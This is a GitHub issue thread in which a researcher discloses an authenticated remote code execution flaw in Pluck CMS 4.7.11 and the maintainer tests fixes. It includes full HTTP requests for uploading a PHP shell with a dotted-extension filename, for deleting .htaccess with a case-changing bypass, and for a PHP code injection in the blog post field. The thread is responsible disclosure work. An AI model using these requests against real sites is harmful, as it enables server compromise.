### ISSUE TITLE
Pluck-4.7.11 admin background exists a remote command execution vulnerability when uploading files

### ISSUE THREAD

**Issue by wooyin** [pluck-cms/pluck#91]
Pluck-4.7.11 admin background exists a remote command execution vulnerability when uploading files

Proof
step1: login -> pages -> manage files
upload .htaccess file to turn files/.htaccess to .htaccess.txt
![图片](https://user-images.githubusercontent.com/48854942/71186014-6cec3380-22b7-11ea-9557-3e257ec201ae.png)

step2: throw .htaccess.txt into trash
![图片](https://user-images.githubusercontent.com/48854942/71186198-c5bbcc00-22b7-11ea-9b45-563580be1fcf.png)

step3: upload shell code
![图片](https://user-images.githubusercontent.com/48854942/71186336-03205980-22b8-11ea-9c50-ce5c86aa4509.png)

```
POST /pluck4711/admin.php?action=files HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------18467633426500
Content-Length: 339
Connection: close
Referer: http://127.0.0.1/pluck4711/admin.php?action=files
Cookie: PHPSESSID=50oi7cqaj4hrmj6pqiufa57lij
Upgrade-Insecure-Requests: 1

-----------------------------18467633426500
Content-Disposition: form-data; name="filefile"; filename="pass07.php......"
Content-Type: application/octet-stream

<?php echo phpinfo();?>
-----------------------------18467633426500
Content-Disposition: form-data; name="submit"

Upload
-----------------------------18467633426500--

```
 
![图片](https://user-images.githubusercontent.com/48854942/71186507-4ed30300-22b8-11ea-901f-c4b4e139151c.png)

step4: view http://127.0.0.1/pluck4711/files/pass07.php
![图片](https://user-images.githubusercontent.com/48854942/71186548-5eeae280-22b8-11ea-8f13-dd8c4fb4bb61.png)

**Comment by BSteelooper** [comment]
Thanks... good find... Missed this in the testing. .htaccess will now be ignored when uploaded.

**Comment by BSteelooper** [comment]
Could you try the https://github.com/pluck-cms/pluck/tree/4.7.12-dev1 release?

**Comment by wooyin** [comment]
can bypass like this 
```
GET /pluck-4.7.12-dev1/admin.php?action=deletefile&var1=.htaccess HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://127.0.0.1/pluck-4.7.12-dev1/admin.php?action=files
Cookie: PHPSESSID=57e7d8gah1oa5b6vomb6dnel35
Upgrade-Insecure-Requests: 1

```

**Comment by BSteelooper** [comment]
How does this last one work? the ..... is not omitted so it is not picked up by apache?
<img width="592" alt="image" src="https://user-images.githubusercontent.com/8290565/71191349-8fb22400-2286-11ea-95c5-89b1f473de34.png">

**Comment by BSteelooper** [comment]
could you do a retest with version https://github.com/pluck-cms/pluck/tree/4.7.12-dev2

**Comment by wooyin** [comment]
use strtolower()
![图片](https://user-images.githubusercontent.com/48854942/71221675-7356cb80-2308-11ea-9f80-fd39e230d0a3.png)

```
GET /pluck-4.7.12-dev2/admin.php?action=deletefile&var1=.htACcess HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://127.0.0.1/pluck-4.7.12-dev2/admin.php?action=files
Cookie: PHPSESSID=mmhe135g2qbk80543g5f6bjksg
Upgrade-Insecure-Requests: 1

```

**Comment by wooyin** [comment]
And you should solve this too. 

![图片](https://user-images.githubusercontent.com/48854942/71222739-a1d6a580-230c-11ea-8427-2df6ae509c3f.png)

cont2 is vulnable

```
POST /pluck-4.7.12-dev2/admin.php?module=blog&page=newpost HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 69
Connection: close
Referer: http://127.0.0.1/pluck-4.7.12-dev2/admin.php?module=blog&page=newpost
Cookie: PHPSESSID=mmhe135g2qbk80543g5f6bjksg
Upgrade-Insecure-Requests: 1

cont1=11111&cont2=2';phpinfo();/*&cont3=22222&save_exit=Save+and+Exit
```

**Comment by wooyin** [comment]
I test on Windows, the system will delete points automatically
![图片](https://user-images.githubusercontent.com/48854942/71236525-2855ac00-233a-11ea-9504-01aec2321520.png)

**Comment by BSteelooper** [comment]
Ok.. I’ll try to find a solution for the windows mishaps
